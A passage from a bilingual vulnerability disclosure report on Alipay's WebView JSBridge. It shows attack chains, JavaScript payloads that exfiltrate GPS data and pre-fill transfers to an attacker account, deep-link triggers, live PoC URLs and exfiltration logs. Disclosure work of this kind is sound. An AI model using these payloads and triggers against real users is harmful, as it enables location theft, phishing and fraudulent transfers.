<section id="chain">
<h2><span class="num">03</span>
<span class="zh">攻击链详解</span>
<span class="en">Attack Chain Details</span>
</h2>
<h3>
<span class="zh">攻击链 A: 网页链接 → WebView → JSBridge → 数据窃取 + 转账劫持</span>
<span class="en">Chain A: Web Link → WebView → JSBridge → Data Theft + Transfer Hijacking</span>
</h3>
<div class="attack-chain">
<div class="chain-step">
<div class="chain-num">1</div>
<div>
<strong>
<span class="zh">攻击者部署恶意页面</span>
<span class="en">Attacker deploys malicious page</span>
</strong>
<p>
<span class="zh">在任何公网 HTTPS 服务器上部署 PoC 页面(如 <code>https://innora.ai/zfb/poc/verify.html</code>)和数据收集端点</span>
<span class="en">Deploy PoC page (e.g., <code>https://innora.ai/zfb/poc/verify.html</code>) and data collection endpoint on any public HTTPS server</span>
</p>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">2</div>
<div>
<strong>
<span class="zh">发送钓鱼链接给受害者</span>
<span class="en">Send phishing link to victim</span>
</strong>
<p>
<span class="zh">通过短信/微信/QQ等发送链接。受害者在手机浏览器中点击后看到"恭喜获得88元红包"等社工页面</span>
<span class="en">Send link via SMS/WeChat/QQ. Victim clicks in mobile browser, sees social engineering page like "Congratulations! You won a ¥88 red packet"</span>
</p>
<div class="evidence-box">
<div class="label">Trigger URL</div>
<code>intent://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html#Intent;scheme=alipays;package=com.eg.android.AlipayGphone;end</code>
</div>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">3</div>
<div>
<strong>
<span class="zh">支付宝 WebView 加载外部页面</span>
<span class="en">Alipay WebView loads external page</span>
</strong>
<p>
<span class="zh">Chrome 通过 <code>intent://</code> scheme 跳转到支付宝。支付宝 Nebula WebView 容器加载攻击者页面。<code>AlipayJSBridge</code> 被自动注入。显示一个"继续访问"警告(但<strong>未告知</strong>用户外部页面将获得 JSBridge API 权限)。</span>
<span class="en">Chrome triggers Alipay via <code>intent://</code> scheme. Alipay's Nebula WebView loads the attacker page. <code>AlipayJSBridge</code> is automatically injected. A "Continue to visit" warning appears (but does <strong>NOT</strong> inform the user that the external page will gain JSBridge API access).</span>
</p>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">4</div>
<div>
<strong>
<span class="zh">JavaScript Payload 自动执行</span>
<span class="en">JavaScript Payload executes automatically</span>
</strong>
<p>
<span class="zh">攻击者 JS 调用 AlipayJSBridge API</span>
<span class="en">Attacker JS calls AlipayJSBridge APIs:</span>
</p>
<pre><code>// GPS 定位窃取
AlipayJSBridge.call("getLocation", {}, function(result) {
// result = {lat: "[脱敏]", lng: "[脱敏]", city: "槟城"}
exfiltrate("GPS", result); // POST to attacker server
});
// 打开转账页面,预填攻击者账号
AlipayJSBridge.call("startApp", {
appId: "09999988",
param: {
actionType: "toAccount",
account: "attacker@evil.com",
amount: "1000"
}
});
// 显示假转账通知
AlipayJSBridge.call("toast", {
content: "Transfer ¥5,000 to Zhang*Ming completed",
type: "success",
duration: 5000
});</code></pre>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">5</div>
<div>
<strong>
<span class="zh">数据回传到攻击者服务器</span>
<span class="en">Data exfiltrated to attacker server</span>
</strong>
<p>
<span class="zh">通过 XHR POST + Image Beacon 双通道将窃取的 GPS、设备信息、会话数据发送到攻击者服务器。<strong>308条完整日志记录在案。</strong></span>
<span class="en">GPS, device info, and session data sent to attacker server via dual-channel XHR POST + Image Beacon. <strong>308 complete log entries recorded.</strong></span>
</p>
</div>
</div>
</div>
<h3>
<span class="zh">攻击链 B: 零交互 DeepLink → 敏感页面直接暴露</span>
<span class="en">Chain B: Zero-Interaction DeepLink → Sensitive Page Direct Exposure</span>
</h3>
<div class="zh">
<p>以下 DeepLink 从浏览器或任何第三方 APP 触发后,支付宝<strong>不显示任何额外警告</strong>,直接跳转到敏感功能页面:</p>
</div>
<div class="en">
<p>The following DeepLinks, when triggered from a browser or any third-party app, cause Alipay to navigate <strong>without any additional warning</strong> directly to sensitive function pages:</p>
</div>
<table>
<tr>
<th>appId</th>
<th>
<span class="zh">目标页面</span><span class="en">Target Page</span>
</th>
<th>
<span class="zh">暴露数据</span><span class="en">Exposed Data</span>
</th>
</tr>
<tr><td><code>20000003</code></td>
<td><span class="zh">交易记录</span><span class="en">Transaction History</span></td>
<td><span class="zh">完整消费历史(商品名、金额、分类)</span><span class="en">Full spending history (items, amounts, categories)</span></td>
</tr>
<tr><td><code>20000116</code></td>
<td><span class="zh">转账联系人</span><span class="en">Transfer Contacts</span></td>
<td><span class="zh">20+ 联系人真实姓名、头像、转账金额</span><span class="en">20+ contacts' real names, avatars, transfer amounts</span></td>
</tr>
<tr><td><code>20000123</code></td>
<td><span class="zh">收款二维码</span><span class="en">Payment QR Code</span></td>
<td><span class="zh">完整收款码 + 真实姓名</span><span class="en">Full payment QR + real name</span></td>
</tr>
<tr><td><code>20000032</code></td>
<td><span class="zh">余额宝</span><span class="en">Yu'E Bao (Money Market)</span></td>
<td><span class="zh">余额 ¥5.00 + 累计收益 ¥9,453.67</span><span class="en">Balance ¥5.00 + total earnings ¥9,453.67</span></td>
</tr>
<tr><td><code>20000180</code></td>
<td><span class="zh">总资产</span><span class="en">Total Assets</span></td>
<td><span class="zh">完整资产概览</span><span class="en">Complete asset overview</span></td>
</tr>
<tr><td><code>20000153</code></td>
<td><span class="zh">芝麻信用</span><span class="en">Zhima Credit Score</span></td>
<td><span class="zh">信用评分</span><span class="en">Credit score</span></td>
</tr>
<tr><td><code>20000193</code></td>
<td><span class="zh">银行卡管理</span><span class="en">Bank Card Management</span></td>
<td><span class="zh">绑定的银行卡信息</span><span class="en">Linked bank card info</span></td>
</tr>
<tr><td><code>09999988</code></td>
<td><span class="zh">转账</span><span class="en">Transfer</span></td>
<td><span class="zh">可预填攻击者收款账号和金额</span><span class="en">Can pre-fill attacker account and amount</span></td>
</tr>
<tr><td><code>20000033</code></td>
<td><span class="zh">提现</span><span class="en">Withdrawal</span></td>
<td><span class="zh">提现页面</span><span class="en">Withdrawal page</span></td>
</tr>
<tr><td><code>20000221</code></td>
<td><span class="zh">亲情号</span><span class="en">Family Account</span></td>
<td><span class="zh">亲情号列表</span><span class="en">Family account list</span></td>
</tr>
<tr><td><code>68687023</code></td>
<td><span class="zh">花呗</span><span class="en">Huabei (Credit)</span></td>
<td><span class="zh">花呗页面</span><span class="en">Credit page</span></td>
</tr>
<tr><td><code>10000007</code></td>
<td><span class="zh">扫一扫</span><span class="en">Scan</span></td>
<td><span class="zh">触发摄像头权限</span><span class="en">Triggers camera permission</span></td>
</tr>
</table>
<div class="evidence-box">
<div class="label">
<span class="zh">触发方式</span><span class="en">Trigger Method</span>
</div>
<pre><code>// From any app or browser:
Intent i = new Intent(Intent.ACTION_VIEW);
i.setData(Uri.parse("alipays://platformapi/startapp?appId=20000003"));
startActivity(i);
// Alipay opens transaction history directly. No warning.</code></pre>
</div>
</section>
<!-- ==================== 3.5 LIVE PoC ==================== -->
<section id="poc">
<h2><span class="num">03.5</span>
<span class="zh">在线 PoC 演示</span>
<span class="en">Live PoC Demonstration</span>
</h2>
<div class="zh">
<p>以下是可在线体验的 PoC 页面(已脱敏,不收集任何数据):</p>
</div>
<div class="en">
<p>Below are live PoC pages you can test (sanitized, no data collection):</p>
</div>
<div class="card" style="border-left: 4px solid var(--purple);">
<h3>
<span class="zh">Trigger 页面 — 模拟钓鱼入口</span>
<span class="en">Trigger Page — Simulated Phishing Entry</span>
</h3>
<p>
<span class="zh">模拟攻击者通过短信/微信发送的钓鱼页面。在安装了支付宝的 Android 手机上用 Chrome 打开即可体验。</span>
<span class="en">Simulates the phishing page an attacker would send via SMS/WeChat. Open in Chrome on an Android phone with Alipay installed.</span>
</p>
<div class="evidence-box">
<div class="label">URL</div>
<a href="https://innora.ai/zfb/poc/trigger.html" style="color: var(--purple); font-weight: 600;">https://innora.ai/zfb/poc/trigger.html</a>
</div>
</div>
<div class="card" style="border-left: 4px solid var(--blue);">
<h3>
<span class="zh">JSBridge PoC — 数据采集演示</span>
<span class="en">JSBridge PoC — Data Collection Demo</span>
</h3>
<p>
<span class="zh">在支付宝 WebView 中加载后,演示 AlipayJSBridge API 可以获取的所有数据。<strong>所有数据仅在本地显示,不发送到任何服务器。</strong></span>
<span class="en">When loaded inside Alipay WebView, demonstrates all data accessible via AlipayJSBridge APIs. <strong>All data is displayed locally only, not sent to any server.</strong></span>
</p>
<div class="evidence-box">
<div class="label">URL</div>
<a href="https://innora.ai/zfb/poc/verify.html" style="color: var(--blue); font-weight: 600;">https://innora.ai/zfb/poc/verify.html</a>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">触发方式</span><span class="en">Trigger Method</span>
</div>
<code style="font-size: 12px; color: var(--text2);">alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/verify.html</code>
</div>
</div>
<div class="card" style="border-left: 4px solid var(--green);">
<h3>
<span class="zh">Chain WebView — 链式加载演示</span>
<span class="en">Chain WebView — Chain Loading Demo</span>
</h3>
<p>
<span class="zh">证明通过 pushWindow 链式加载的页面同样获得完整 JSBridge 访问权限。</span>
<span class="en">Proves that pages chain-loaded via pushWindow also receive full JSBridge access.</span>
</p>
<div class="evidence-box">
<div class="label">URL</div>
<a href="https://innora.ai/zfb/poc/chain.html" style="color: var(--green); font-weight: 600;">https://innora.ai/zfb/poc/chain.html</a>
</div>
</div>
</section>
<!-- ==================== 4. VERIFIED ISSUES ==================== -->
<section id="vulns">
<h2><span class="num">04</span>
<span class="zh">已验证安全问题</span>
<span class="en">Verified Security Issues</span>
</h2>
<div class="zh">
<p>以下所有问题均在真实设备上端到端验证,有服务器日志和截图为证。我们对每个发现都标注了验证状态和证据类型。</p>
</div>
<div class="en">
<p>All issues below were verified end-to-end on real devices, with server logs and screenshots as evidence. Each finding includes verification status and evidence type.</p>
</div>
<!-- V-01 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-01: <span class="zh">转账页面预填攻击者账号</span><span class="en">Transfer Page Pre-filled with Attacker Account</span></h3>
<p>
<span class="zh"><code>startApp</code> API 允许外部页面打开支付宝转账页面,并预填收款账号和转账金额。受害者看到的是一个已经填好攻击者账号的转账界面。最终转账仍需用户点击确认按钮,但配合 UI 欺骗V-08和社会工程用户误操作的风险极高。</span>
<span class="en">The <code>startApp</code> API allows external pages to open Alipay's transfer page with pre-filled recipient account and amount. The victim sees a transfer form already populated with the attacker's account. Final transfer still requires user confirmation, but combined with UI spoofing (V-08) and social engineering, the risk of user error is extremely high.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_startApp:转账预填(09999988)",
"data":{"status":"ok","result":{"success":true}}}</code></pre>
</div>
<p><strong>API:</strong> <code>AlipayJSBridge.call("startApp", {appId:"09999988", param:{actionType:"toAccount", account:"attacker@evil.com", amount:"1000"}})</code></p>
</div>
<!-- V-02 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-02: <span class="zh">pushWindow 执行转账 DeepLink</span><span class="en">pushWindow Executes Transfer DeepLink</span></h3>
<p>
<span class="zh"><code>pushWindow</code> API 允许外部页面通过 <code>alipays://</code> scheme 执行转账 DeepLink传递攻击者账号和金额。</span>
<span class="en">The <code>pushWindow</code> API allows external pages to execute transfer DeepLinks via the <code>alipays://</code> scheme, passing attacker account and amount.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_pushWindow:transfer_scheme",
"data":{"status":"ok","result":{"success":"true"}}}</code></pre>
</div>
</div>
<!-- V-03 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-03: <span class="zh">pushWindow 打开支付收银台</span><span class="en">pushWindow Opens Payment Cashier</span></h3>
<p>
<span class="zh">外部页面可以通过 <code>pushWindow</code> 打开支付宝的支付收银台 URL。</span>
<span class="en">External pages can open Alipay's payment cashier URL via <code>pushWindow</code>.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_pushWindow:cashier(支付收银台)",
"data":{"status":"ok","result":{"success":"true"}}}</code></pre>
</div>
</div>
<!-- V-04 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-04: <span class="zh">tradePay 触发支付 SDK</span><span class="en">tradePay Triggers Payment SDK</span></h3>
<p>
<span class="zh"><code>tradePay</code> API 可以被外部页面调用弹出支付宝支付界面。我们测试了3种参数格式全部成功触发resultCode=6001表示用户手动取消但支付界面确实弹出了</span>
<span class="en">The <code>tradePay</code> API can be called from external pages, launching the Alipay payment UI. We tested 3 parameter formats, all successfully triggered (resultCode=6001 means user manually cancelled, but the payment UI did appear).</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_tradePay:full_orderStr",
"data":{"status":"ok","result":{"resultCode":"6001"}}}</code></pre>
</div>
</div>
<!-- V-05 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-05: <span class="zh">完整数据外传链路 (308条日志)</span><span class="en">Full Data Exfiltration Chain (308 Log Entries)</span></h3>
<p>
<span class="zh">外部页面中的 JavaScript 成功将 GPS 坐标、设备信息、网络信息、会话 ID 等数据通过 XHR POST + Image Beacon 双通道发送到攻击者服务器。总计 <strong>308 条</strong>完整日志记录。</span>
<span class="en">JavaScript in external pages successfully exfiltrated GPS coordinates, device info, network info, session IDs via dual-channel XHR POST + Image Beacon to attacker server. Total: <strong>308 complete log entries</strong>.</span>
</p>
</div>
<!-- V-06 to V-08 -->
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-06: <span class="zh">18个敏感内部页面可被外部页面跳转</span><span class="en">18 Sensitive Internal Pages Navigable from External Page</span></h3>
<p>
<span class="zh">通过 <code>startApp</code> API外部页面可以跳转到包括交易记录、银行卡管理、芝麻信用、提现、亲情号在内的 18 个敏感内部页面,全部返回 <code>success: true</code></span>
<span class="en">Via the <code>startApp</code> API, external pages can navigate to 18 sensitive internal pages including transaction history, bank card management, credit score, withdrawal, and family accounts. All returned <code>success: true</code>.</span>
</p>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-07: <span class="zh">GPS 精确定位窃取(无用户感知)</span><span class="en">GPS Location Theft (No User Awareness)</span></h3>
<p>
<span class="zh"><code>getLocation</code> API 在外部页面调用时,如果用户此前已授予支付宝位置权限,<strong>不显示任何二次确认弹窗</strong>,直接返回精确 GPS 坐标。已在 3 台设备上验证(新西兰 Android、马来西亚 Android、中国杭州 iOS。注意 iOS 14+ 的模糊定位设置可能影响精度。</span>
<span class="en"><code>getLocation</code> API when called from external pages, if the user has previously granted location permission to Alipay, shows <strong>no secondary consent dialog</strong>, directly returning precise GPS coordinates. Verified on 3 devices (New Zealand Android, Malaysia Android, Hangzhou China iOS). Note: iOS 14+ approximate location settings may affect precision.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">三台设备 GPS 数据</span><span class="en">GPS Data from 3 Devices</span>
</div>
<pre><code>// Samsung S25 Ultra — Auckland, New Zealand
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "奥克兰", "country": "新西兰", "accuracy": 25}
// Redmi 23129RN51X — Penang, Malaysia
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "槟城", "country": "马来西亚", "accuracy": 35}
// iPhone 16 Pro — Hangzhou, China (厂商安全业务负责人设备全程无GPS授权声明/弹窗)
// 3轮测试精度: 17.4m → 8.8mlocationReducedAccuracy: 0精确定位页面加载到回传约7秒
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "杭州市"}</code></pre>
</div>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-08: <span class="zh">UI 欺骗: 虚假转账通知 + 标题篡改</span><span class="en">UI Spoofing: Fake Transfer Notifications + Title Bar Spoofing</span></h3>
<p>
<span class="zh">攻击者可在支付宝内显示任意 toast 消息(如 "转账 ¥5,000 到 张*明 成功"),并将标题栏修改为 "安全中心" / "红包领取" 等钓鱼标题。配合社会工程,受害者无法区分真假。</span>
<span class="en">Attacker can display arbitrary toast messages inside Alipay (e.g., "Transfer ¥5,000 to Zhang*Ming completed") and modify the title bar to "Security Center" / "Red Packet Claim." Combined with social engineering, victims cannot distinguish real from fake.</span>
</p>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-09: <span class="zh">OAuth 授权流程劫持</span><span class="en">OAuth Authorization Flow Hijacking</span></h3>
<p>
<span class="zh"><code>getAuthCode</code> API 可被外部页面触发,发起 OAuth 服务端调用。虽然未成功获取授权码,但弹出了"服务忙,请稍后再试"弹窗,证明请求到达了 OAuth 服务端。</span>
<span class="en">The <code>getAuthCode</code> API can be triggered by external pages, initiating OAuth server-side calls. While no auth code was obtained, a "Service busy, please try later" popup appeared, proving the request reached the OAuth server.</span>
</p>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-10: <span class="zh">零交互暴露余额宝余额和转账联系人</span><span class="en">Zero-Interaction Exposure of Yu'E Bao Balance and Transfer Contacts</span></h3>
<p>
<span class="zh">通过 DeepLink 直接打开余额宝页面,显示余额 ¥5.00 和累计收益 ¥9,453.67。转账联系人页面暴露 20+ 联系人完整真实姓名。无需任何额外确认。</span>
<span class="en">DeepLink directly opens Yu'E Bao page showing balance ¥5.00 and total earnings ¥9,453.67. Transfer contacts page exposes 20+ contacts' full real names. No additional confirmation required.</span>
</p>
</div>
<!-- Full vulnerability table -->
<h3>
<span class="zh">完整问题列表</span>
<span class="en">Complete Issue List</span>
</h3>
<table>
<tr>
<th>ID</th>
<th>
<span class="zh">问题</span><span class="en">Issue</span>
</th>
<th>
<span class="zh">严重度</span><span class="en">Severity</span>
</th>
<th>
<span class="zh">验证</span><span class="en">Verified</span>
</th>
</tr>
<tr><td>V-01</td><td><span class="zh">startApp 预填攻击者账号到转账页面</span><span class="en">startApp pre-fills attacker account on transfer page</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-02</td><td><span class="zh">pushWindow 执行转账 DeepLink</span><span class="en">pushWindow executes transfer DeepLink</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-03</td><td><span class="zh">pushWindow 打开支付收银台</span><span class="en">pushWindow opens payment cashier</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-04</td><td><span class="zh">tradePay 触发支付 SDK</span><span class="en">tradePay triggers payment SDK</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-05</td><td><span class="zh">完整数据外传链路</span><span class="en">Full data exfiltration chain</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-06</td><td><span class="zh">18个敏感页面可跳转</span><span class="en">18 sensitive pages navigable</span></td><td><span class="severity sev-high">HIGH</span></td><td>42 screenshots</td></tr>
<tr><td>V-07</td><td><span class="zh">GPS 精确定位窃取</span><span class="en">GPS location theft</span></td><td><span class="severity sev-high">HIGH</span></td><td>3 devices</td></tr>
<tr><td>V-08</td><td><span class="zh">UI 欺骗 (toast + 标题篡改)</span><span class="en">UI spoofing (toast + title bar)</span></td><td><span class="severity sev-high">HIGH</span></td><td>308 logs</td></tr>
<tr><td>V-09</td><td><span class="zh">OAuth 授权流程劫持</span><span class="en">OAuth flow hijacking</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
<tr><td>V-10</td><td><span class="zh">余额宝余额 + 联系人姓名暴露</span><span class="en">Yu'E Bao balance + contact names exposed</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
<tr><td>V-11</td><td><span class="zh">收款二维码 + 真实姓名泄露</span><span class="en">Payment QR + real name exposure</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
<tr><td>V-12</td><td><span class="zh">pushWindow 跳转登录页面 (钓鱼入口)</span><span class="en">pushWindow redirects to login page (phishing)</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
<tr><td>V-13</td><td><span class="zh">链式 WebView 攻击</span><span class="en">Chain WebView attack</span></td><td><span class="severity sev-high">HIGH</span></td><td>308 logs</td></tr>
<tr><td>V-14</td><td><span class="zh">会话信息泄露</span><span class="en">Session info leakage</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
<tr><td>V-15</td><td><span class="zh">完整设备指纹外传</span><span class="en">Full device fingerprint exfiltration</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
<tr><td>V-16</td><td><span class="zh">网络信息泄露</span><span class="en">Network info leakage</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
<tr><td>V-17</td><td><span class="zh">API 权限地图泄露</span><span class="en">API permission map leakage</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
</table>
</section>
<!-- ==================== 5. EVIDENCE ==================== -->
<section id="evidence">
<h2><span class="num">05</span>
<span class="zh">证据展示</span>
<span class="en">Evidence</span>
</h2>
<h3>
<span class="zh">服务器端数据外传日志</span>
<span class="en">Server-Side Exfiltration Logs</span>
</h3>
<div class="zh">
<p>以下是攻击者服务器实际接收到的数据。这些日志记录在 <code>innora.ai</code> 上的数据收集端点,证明数据确实从支付宝 WebView 中外传到了外部服务器。</p>
</div>
<div class="en">
<p>Below are actual data received by the attacker server. These logs were recorded at the data collection endpoint on <code>innora.ai</code>, proving data was indeed exfiltrated from Alipay WebView to an external server.</p>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">GPS 定位数据(马来西亚槟城)</span>
<span class="en">GPS Location Data (Penang, Malaysia)</span>
</div>
<pre><code>{
"timestamp": "2026-03-07 11:53:51.599",
"method": "POST",
"path": "/exfil",
"body": {
"tag": "getLocation:GPS location",
"data": {
"status": "ok",
"data": {
"accuracy": 35,
"city": "槟城",
"country": "马来西亚",
"latitude": "[脱敏]",
"longitude": "[脱敏]"
}
}
}
}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">设备完整指纹Redmi</span>
<span class="en">Full Device Fingerprint (Redmi)</span>
</div>
<pre><code>{
"tag": "getSystemInfo:Device info",
"data": {
"apiLevel": 36,
"app": "alipay",
"bluetoothEnabled": true,
"brand": "Redmi",
"cameraAuthorized": false,
"currentBattery": "100%",
"locationAuthorized": true,
"model": "Xiaomi 23129RN51X",
"platform": "Android",
"screenHeight": 1650,
"screenWidth": 720,
"storage": "119 GB",
"system": "16",
"version": "10.8.26.7000",
"wifiEnabled": true
}
}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">会话参数泄露(含 sessionId 和来源信息)</span>
<span class="en">Session Parameter Leakage (incl. sessionId and source info)</span>
</div>
<pre><code>{
"tag": "getStartupParams",
"data": {
"sessionId": "session_20000067_22751",
"startFromExternal": "true",
"sourcePackageName": "com.android.chrome",
"safePayEnabled": "true",
"appId": "20000067",
"url": "http://192.168.80.12:8888/chain1.html"
}
}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">转账页面预填成功</span>
<span class="en">Transfer Page Pre-fill Success</span>
</div>
<pre><code>{"tag": "f_startApp:转账预填(09999988)", "data": {"status": "ok", "result": {"success": true}}}
{"tag": "f_pushWindow:transfer_scheme", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_pushWindow:cashier(支付收银台)", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_tradePay:full_orderStr", "data": {"status": "ok", "result": {"resultCode": "6001"}}}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">User-Agent 证明数据来自支付宝 WebView</span>
<span class="en">User-Agent Proves Data Originates from Alipay WebView</span>
</div>
<pre><code>Mozilla/5.0 (Linux; Android 16; 23129RN51X Build/BP2A.250605.031.A3; wv)
AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/126.0.6478.122
NebulaSDK/1.8.100112 Nebula
AliApp(AP/10.8.26.7000) AlipayClient/10.8.26.7000
Language/zh-Hant Region/CN</code></pre>
<p>
<span class="zh">User-Agent 中包含 <code>NebulaSDK</code><code>AliApp(AP/10.8.26.7000)</code><code>AlipayClient</code> — 这是支付宝 Nebula WebView 容器的独特标识,无法伪造。证明这些请求确实来自支付宝应用内部。</span>
<span class="en">The User-Agent contains <code>NebulaSDK</code>, <code>AliApp(AP/10.8.26.7000)</code>, <code>AlipayClient</code> — unique identifiers of the Alipay Nebula WebView container that cannot be forged. This proves these requests genuinely originated from within the Alipay app.</span>
</p>
</div>
<h3>
<span class="zh">证据文件清单</span>
<span class="en">Evidence File Inventory</span>
</h3>
<table>
<tr>
<th>
<span class="zh">文件类型</span><span class="en">File Type</span>
</th>
<th>
<span class="zh">数量</span><span class="en">Count</span>
</th>
<th>
<span class="zh">描述</span><span class="en">Description</span>
</th>
</tr>
<tr>
<td>
<span class="zh">设备截图</span><span class="en">Device Screenshots</span>
</td>
<td>42</td>
<td>
<span class="zh">包含 CRITICAL 标签的 25 张 + 普通验证 17 张</span>
<span class="en">25 with CRITICAL labels + 17 general verification</span>
</td>
</tr>
<tr>
<td>
<span class="zh">服务器日志</span><span class="en">Server Logs</span>
</td>
<td>308 entries</td>
<td>
<span class="zh">exfil_server_log_20260307_complete.jsonl (136 KB)</span>
<span class="en">exfil_server_log_20260307_complete.jsonl (136 KB)</span>
</td>
</tr>
<tr>
<td><span class="zh">PoC HTML</span><span class="en">PoC HTML</span></td>
<td>8</td>
<td>
<span class="zh">chain1~chain8 攻击链 + trigger 触发页</span>
<span class="en">chain1~chain8 attack chains + trigger page</span>
</td>
</tr>
<tr>
<td>
<span class="zh">攻击服务器</span><span class="en">Attack Server</span>
</td>
<td>1</td>
<td>
<span class="zh">Python server.py (数据收集 + 日志记录)</span>
<span class="en">Python server.py (data collection + logging)</span>
</td>
</tr>
<tr>
<td>Nginx</td>
<td>1</td>
<td>
<span class="zh">nginx_exfil_access.log (52 KB)</span>
<span class="en">nginx_exfil_access.log (52 KB)</span>
</td>
</tr>
</table>
</section>
<!-- ==================== 6. DEVICES ==================== -->
<section id="devices">
<h2><span class="num">06</span>
<span class="zh">跨平台验证</span>
<span class="en">Cross-Platform Verification</span>
</h2>
<div class="zh">
<p>所有攻击链在以下 3 台真实设备上独立验证成功,覆盖 Android 和 iOS 平台:</p>
</div>
<div class="en">
<p>All attack chains were independently verified on 3 real devices across Android and iOS platforms:</p>
</div>
<div class="devices-grid">
<div class="device-card">
<div class="icon">📱</div>
<div class="name">Samsung Galaxy S25 Ultra</div>
<div class="detail">SM-S938B</div>
<div class="detail">Android 16 (API 36)</div>
<div class="detail">
<span class="zh">奥克兰, 新西兰</span>
<span class="en">Auckland, New Zealand</span>
</div>
<div class="detail">Alipay 10.8.26.7000</div>
</div>
<div class="device-card">
<div class="icon">📱</div>
<div class="name">Redmi 23129RN51X</div>
<div class="detail">Xiaomi</div>
<div class="detail">Android 16 (API 36)</div>
<div class="detail">
<span class="zh">槟城, 马来西亚</span>
<span class="en">Penang, Malaysia</span>
</div>
<div class="detail">Alipay 10.8.26.7000</div>
</div>
<div class="device-card">
<div class="icon">📱</div>
<div class="name">iPhone 16 Pro</div>
<div class="detail">iPhone (18,4)</div>
<div class="detail">iOS 26.3.1</div>
<div class="detail">
<span class="zh">杭州, 中国</span>
<span class="en">Hangzhou, China</span>
</div>
<div class="detail">Alipay 10.8.30.6000</div>
</div>
</div>
</section>
<!-- ==================== 7. iOS ==================== -->
<section id="ios">
<h2><span class="num">07</span>
<span class="zh">iOS 特有风险</span>
<span class="en">iOS-Specific Risks</span>
</h2>
<div class="zh">
<p>iPhone 设备上的 API 权限比 Android <strong>更宽松</strong>,攻击面更大:</p>
</div>
<div class="en">
<p>API permissions on iPhone are <strong>more permissive</strong> than Android, creating a larger attack surface:</p>
</div>
<table>
<tr>
<th>API</th>
<th>Android</th>
<th>iOS</th>
<th>
<span class="zh">风险</span><span class="en">Risk</span>
</th>
</tr>
<tr>
<td><code>tradePay</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">触发支付 SDK</span><span class="en">Triggers payment SDK</span>
</td>
</tr>
<tr>
<td><code>share</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh"><strong>蠕虫传播向量</strong> — 自动分享恶意链接到微信/QQ</span>
<span class="en"><strong>Worm propagation vector</strong> — auto-share malicious links to WeChat/QQ</span>
</td>
</tr>
<tr>
<td><code>scan</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">打开摄像头</span><span class="en">Opens camera</span>
</td>
</tr>
<tr>
<td><code>chooseImage</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">访问相册</span><span class="en">Access photo library</span>
</td>
</tr>
<tr>
